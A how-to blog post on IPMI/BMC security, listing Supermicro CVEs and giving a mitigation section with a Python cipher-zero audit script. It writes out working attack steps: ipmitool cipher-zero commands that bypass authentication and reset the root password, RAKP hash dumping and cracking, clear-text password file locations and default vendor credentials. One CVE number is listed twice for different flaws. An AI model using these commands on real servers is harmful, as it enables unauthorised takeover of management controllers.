Blog: How-Tos
Backdoor in the Backplane. Doing IPMI security better
TL;DR
- IPMI, released by Intel in 1998, is a hardware management interface operating independently of the OS, often using 623/udp.
- It monitors hardware data (e.g., temperature, power) and supports remote recovery, integrated into BMCs like HP iLO, Dell DRAC, and others.
- IPMI vulnerabilities include authentication bypasses, credential leaks, and buffer overflows, particularly in Supermicro systems.
- Mitigations include using complex passwords, isolating IPMI on restricted networks, and regularly updating firmware despite infrequent patches.
What is IPMI and how is it used?
Released by Intel in 1998, IPMI (Intelligent Platform Management Interface) is a set of specifications that define management communication over both local buses and the network. Over the network it typically uses 623/udp, although some implementations also listen on TCP.
IPMI messaging is used to monitor hardware-level sensor data such as temperatures, power supply state and other board voltages. Because it works without any system management software on the host, it can even be used for recovery when the OS has become unusable.
Overall, IPMI is usually implemented in a dedicated hardware controller, the BMC (Baseboard Management Controller), which is sold under a wide variety of brands such as HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM and Supermicro IPMI. As it is independent of the OS, it can be used without the computer being powered on, as long as the BMC is connected to a LAN and a power supply, at the discretion of the system admin, or so one would think.
Common IPMI vulnerabilities
CVE-2019-16649
On Supermicro H11, H12, M11, X9, X10, and X11 products, a combination of encryption and authentication problems in the virtual media service allows capture of BMC credentials and data transferred over virtual media devices. Attackers can use captured credentials to connect virtual USB devices to the server managed by the BMC.
CVE-2019-16649
On Supermicro X10 and X11 products, a client’s access privileges may be transferred to a different client that later has the same socket file descriptor number. In opportunistic circumstances, an attacker can simply connect to the virtual media service, and then connect virtual USB devices to the server managed by the BMC.
CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password. This is rated 10.0 on CVSS and also comes with its own Metasploit module, which I will detail in the next section.
Overall there are 8 reports for Supermicro alone involving IPMI, of which 6 are rated critical. A large portion of these vulnerabilities are buffer overflows, a trend that runs all the way from 2013 to 2017.
Here is the link to the CVE website detailing these further: https://www.cvedetails.com/vulnerability-list/vendor_id-12753/Supermicro.html
Methods for enumerating IPMI
IPMI 2.0 Cipher Zero Authentication Bypass Scanner
Developed by Dan Farmer, this Metasploit module identifies IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability using cipher zero.
Use this module for identifying the issue.
```console
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > show actions
...actions...
msf auxiliary(ipmi_cipher_zero) > set ACTION <action-name>
msf auxiliary(ipmi_cipher_zero) > show options
...show and set options...
msf auxiliary(ipmi_cipher_zero) > run
```
This can be abused by using ipmitool:
```console
apt-get install ipmitool   # Install
# Using -C 0 any password is accepted
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list   # Use Cipher 0 to dump a list of users
ID  Name   Callin  Link Auth  IPMI Msg  Channel Priv Limit
2   root   true    true       true      ADMINISTRATOR
3   Oper1  true    true       true      ADMINISTRATOR
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123   # Change the password of root
```
IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
This vulnerability allows one to ask the BMC for the MD5 or SHA1 RAKP hash of any username; if the username exists, the hash is sent back. The output can be written in John or Hashcat format via the module options. A list of usernames is required; Metasploit ships a default list, which can be changed if required.
Hashcat can crack RAKP hashes out of the box, whereas John can only do so with the ‘bleeding-jumbo’ branch, built as follows:
```console
$ git clone https://github.com/magnumripper/JohnTheRipper.git
$ cd JohnTheRipper
$ git checkout bleeding-jumbo
$ cd src
$ make linux-x86-64
$ cd ../run
$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john
```
Now onto the module itself:
```console
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
ipmitool can then be used with -C 0 to bypass authentication and change the root password, as before, to abc123 or whatever password is desired:
```console
apt-get install ipmitool   # Install
# Using -C 0 any password is accepted
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list   # Use Cipher 0 to dump a list of users
ID  Name   Callin  Link Auth  IPMI Msg  Channel Priv Limit
2   root   true    true       true      ADMINISTRATOR
3   Oper1  true    true       true      ADMINISTRATOR
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
```
If you would like to test these on a simulated server use this command to install:
```console
$ docker pull vaporio/ipmi-simulator
```
Supermicro IPMI clear text passwords
IPMI 2.0 specifies that the BMC must support HMAC (Hash-Based Message Authentication Code) methods such as SHA1 and MD5. As shown in the examples above, this is a significant weakness, because a retrieved hash can be cracked offline. It also means the BMC needs access to the clear-text password in order to calculate the authentication HMAC in the first place.
So, the BMC must store a clear-text copy of every configured user password somewhere in non-volatile storage. On Supermicro the location varies between firmware versions: it is either /nv/PSBlock or /nv/PSStore. The passwords are scattered among binary data, but each one directly follows its username, so they can be found fairly easily. This becomes a real problem when passwords are shared between BMCs or other devices:
```console
cat /nv/PSBlock
admin ADMINpassword^TT rootOtherPassword!
```
Default passwords:
| Brand | Default Username | Default Password |
|---|---|---|
| HP Integrated Lights Out (iLO) | Administrator | Random, 8-character generated string |
| Dell Remote Access Card (iDRAC, DRAC) | root | calvin |
| IBM Integrated Management Module (IMM) | USERID | PASSW0RD (0 is a zero) |
| Fujitsu Integrated Remote Management Controller | admin | admin |
| Supermicro IPMI (2.0) | ADMIN | ADMIN |
| Oracle and Sun Integrated Lights Out Manager (ILOM) | root | changeme |
| ASUS iKVM BMC | admin | admin |
How to prevent attacks
Because IPMI is insecure by design and is rarely patched, attacks are difficult to prevent entirely.
Long, complex passwords make any retrieved hash far harder to crack, and isolating IPMI on a network that is reachable only through a VPN removes the exposure altogether.
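Beyond passwords and VPN isolation, the cipher-zero bypass described earlier can be switched off on the BMC itself. The following Python helper is an added example, not code from the original post: it audits saved `ipmitool lan print <channel>` output for an enabled cipher suite 0 and builds the 15-character argument for `ipmitool lan set <channel> cipher_privs ...` that marks suite 0 unused. The sample output is constructed, and the privilege letters are assumed to be positional over the listed suites, as ipmitool prints them.

```python
"""Audit `ipmitool lan print <channel>` output for an enabled cipher suite 0 (added example)."""
import sys

# Privilege letters ipmitool uses in the "Cipher Suite Priv Max" string.
PRIV_NAMES = {"X": "unused", "c": "CALLBACK", "u": "USER",
              "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}

# Constructed excerpt of `ipmitool lan print 1` from a BMC that still honours cipher 0.
SAMPLE_LAN_PRINT = """\
IP Address Source       : Static Address
IP Address              : 10.0.0.22
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     a=ADMIN
"""

def parse_cipher_privs(text):
    """Map each listed cipher suite ID to its max-privilege letter. Assumption: the
    letters are positional over the "RMCP+ Cipher Suites" list, so the lines are zipped."""
    suites = privs = None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "RMCP+ Cipher Suites":
            suites = [int(s) for s in value.split(",") if s.strip()]
        elif key.strip() == "Cipher Suite Priv Max":
            privs = value.strip()
    if suites is None or privs is None:
        raise ValueError("cipher suite lines not found in lan print output")
    return dict(zip(suites, privs))

def cipher_zero_findings(text):
    """Return findings as strings; an empty list means cipher suite 0 is unused."""
    priv = parse_cipher_privs(text).get(0, "X")  # a suite that is not listed is unused
    if priv == "X":
        return []
    return [f"cipher suite 0 enabled with privilege {PRIV_NAMES.get(priv, priv)}"]

def recommended_cipher_privs(text):
    """Build the 15-character argument for `ipmitool lan set <ch> cipher_privs`
    that marks cipher suite 0 unused and keeps every other suite's privilege."""
    mapping = parse_cipher_privs(text)
    letters = ["X" if suite == 0 else priv for suite, priv in mapping.items()]
    return "".join(letters).ljust(15, "X")[:15]  # ipmitool expects exactly 15 letters

if __name__ == "__main__":
    output = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LAN_PRINT
    for finding in cipher_zero_findings(output):
        print("FINDING:", finding)
    print("suggested cipher_privs:", recommended_cipher_privs(output))
```

Feed it the real output from a management host (`ipmitool ... lan print 1 | python3 audit_cipher0.py`), apply the suggested string with `ipmitool ... lan set 1 cipher_privs <string>`, then re-run `lan print` to confirm the first letter is now X.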
Conclusion
IPMI remains a powerful but dangerously overlooked protocol in many enterprise environments. Whilst its ability to manage systems out-of-band is invaluable, it carries significant security trade-offs, especially when outdated firmware, default credentials and exposed interfaces are in play. As demonstrated, IPMI can lead to, or aid, a malicious actor compromising the full domain with little more than network access.
As a result, organisations, regardless of their size and standing, should take a proactive approach: enforce strong authentication, isolate IPMI interfaces on secure VLANs, disable unused features such as virtual media, and audit firmware versions more regularly.
Sources
- https://book.hacktricks.xyz/pentesting/623-udp-ipmi
- https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/
- https://www.computerworld.com/article/2708437/ipmi--the-most-dangerous-protocol-you-ve-never-heard-of.html
- https://www.supermicro.com/en/support/security_BMC_virtual_media
- https://cve.mitre.org/